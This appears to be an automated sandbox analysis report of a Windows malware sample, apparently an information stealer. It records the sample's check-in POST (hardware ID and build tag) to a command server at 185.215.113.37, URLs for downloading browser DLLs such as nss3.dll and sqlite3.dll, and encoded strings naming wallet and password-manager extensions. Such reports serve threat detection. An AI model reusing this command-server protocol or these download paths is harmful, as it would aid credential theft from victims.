Source: unknown HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEGIIIECAKEBFBAAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 38 38 41 36 36 45 42 42 36 39 33 31 39 36 39 33 34 38 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 45 2d 2d 0d 0a Data Ascii: ------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="hwid"8588A66EBB693196934881------IDHIEGIIIECAKEBFBAAEContent-Disposition: form-data; name="build"doma------IDHIEGIIIECAKEBFBAAE--
Source: file.exe, 00000000.00000002.1963816981.00000000008BB000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1964639333.0000000001277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dllm
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll5
Source: file.exe, 00000000.00000002.1964639333.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllUser
Source: file.exe, 00000000.00000002.1964639333.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllp
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dllw
Source: file.exe, 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dlly
Source: file.exe, 00000000.00000002.1964639333.0000000001277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1964639333.0000000001277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dlle
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1964639333.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3d
Source: file.exe, 00000000.00000003.1807587469.00000000012CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php5
Source: file.exe, 00000000.00000002.1964639333.0000000001277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpEGIECGCBKFIEBGCAA
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpFirefox
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpdll
Source: file.exe, 00000000.00000002.1964639333.0000000001277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpem
Source: file.exe, 00000000.00000002.1964639333.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
Source: file.exe, 00000000.00000002.1964639333.0000000001262000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx
Source: file.exe, 00000000.00000002.1964639333.000000000121E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37S
Source: file.exe, 00000000.00000002.1963816981.00000000008BB000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1984825270.000000006C64D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1976081255.000000001D809000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1984700175.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://support.mozilla.org
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000003.1794962730.000000001D70C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1963816981.00000000006F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1963816981.00000000006F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1963816981.00000000006F1000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1964639333.0000000001291000.00000004.00000020.00020000.00000000.sdmp, AFIEGIECGCBKFIEBGCAA.0.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1807507704.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, IIJDBGDG.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1926599554.00000000299EE000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1963816981.000000000074A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1926599554.00000000299EE000.00000004.00000020.00020000.00000000.sdmp, KEHDBAEGIIIEBGCAAFHIDHDBFB.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 0_2_6C5FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C63B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C63B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C63B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5DF280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D209D 0_2_009D209D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB29A9 0_2_00AB29A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ABF975 0_2_00ABF975
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB7293 0_2_00AB7293
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ABC20B 0_2_00ABC20B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009DAB9D 0_2_009DAB9D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAEB92 0_2_00AAEB92
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009D332D 0_2_009D332D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB3C05 0_2_00AB3C05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC1448 0_2_00AC1448
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ABDD74 0_2_00ABDD74
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AB062C 0_2_00AB062C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097C794 0_2_0097C794
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ABA7E4 0_2_00ABA7E4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B8BFC3 0_2_00B8BFC3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A17F43 0_2_00A17F43
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D35A0 0_2_6C5D35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5440 0_2_6C5E5440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64545C 0_2_6C64545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64542B 0_2_6C64542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64AC00 0_2_6C64AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615C10 0_2_6C615C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C622C10 0_2_6C622C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD4D0 0_2_6C5FD4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C616CF0 0_2_6C616CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E64C0 0_2_6C5E64C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DD4E0 0_2_6C5DD4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6334A0 0_2_6C6334A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C4A0 0_2_6C63C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E6C80 0_2_6C5E6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FED10 0_2_6C5FED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EFD00 0_2_6C5EFD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C600512 0_2_6C600512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6385F0 0_2_6C6385F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C610DD0 0_2_6C610DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C646E63 0_2_6C646E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F9E50 0_2_6C5F9E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F4640 0_2_6C5F4640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C622E4E 0_2_6C622E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DC670 0_2_6C5DC670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C613E50 0_2_6C613E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C639E30 0_2_6C639E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C625600 0_2_6C625600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C617E10 0_2_6C617E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6476E3 0_2_6C6476E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DBEF0 0_2_6C5DBEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5EFEF0 0_2_6C5EFEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C634EA0 0_2_6C634EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F5E90 0_2_6C5F5E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63E680 0_2_6C63E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9F00 0_2_6C5E9F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C617710 0_2_6C617710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606FF0 0_2_6C606FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DDFE0 0_2_6C5DDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6277A0 0_2_6C6277A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F8850 0_2_6C5F8850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FD850 0_2_6C5FD850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61F070 0_2_6C61F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61B820 0_2_6C61B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C624820 0_2_6C624820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7810 0_2_6C5E7810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6158E0 0_2_6C6158E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6450C7 0_2_6C6450C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FC0E0 0_2_6C5FC0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6060A0 0_2_6C6060A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B970 0_2_6C62B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64B170 0_2_6C64B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FA940 0_2_6C5FA940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ED960 0_2_6C5ED960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60D9B0 0_2_6C60D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C615190 0_2_6C615190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C632990 0_2_6C632990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DC9A0 0_2_6C5DC9A0
